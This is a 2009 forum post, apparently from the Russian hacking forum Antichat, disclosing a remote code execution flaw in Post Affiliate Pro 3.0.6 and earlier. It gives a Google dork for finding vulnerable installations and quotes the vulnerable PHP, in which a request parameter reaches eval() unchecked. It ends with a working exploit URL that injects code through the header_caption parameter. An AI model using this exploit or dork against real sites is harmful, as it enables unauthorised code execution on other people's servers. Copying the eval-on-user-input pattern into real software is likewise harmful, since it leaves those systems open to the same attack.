05.01.2009, 19:01
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
Post Affiliate Pro <=3.0.6 Code Execution
Post Affiliate Pro
Версия: 3.0.6 и более ранние
Дорк: inurl:affiliates intext:"version 3.0." "generated in" "DB Requests"
Уязвимый код:
/affiliate/include/Affiliate/Merchants/Views/ResourceBrowser.class.php:
PHP код:
function process() {
if(!empty($_REQUEST['action'])) {
switch($_REQUEST['action']) {
case 'addheader':
$this->processAddHeader();
break;
/**/
}
}
PHP код:
function processAddHeader() {
if($_REQUEST['commited'] == 'yes') {
$name = $_REQUEST['header_name'];
$caption = $_REQUEST['header_caption'];
if(!empty($name) && !empty($caption)) {
$this->menu->createMenuHeader($name, $caption);
$this->menu->save();
return true;
} /**/
}
/affiliate/include/QUnit/UI/Menu.class.php
PHP код:
function createMenuHeader($name, $caption) {
if($caption != '') eval("\$caption = $caption;");
/**/
}
Эксплоит:
/affiliate/merchants/styles.php?md=Affiliate_Merchants_Views_ResourceBr owser&action=addheader&commited=yes&header_name=lo lol&header_caption=phpinfo()
|
|
|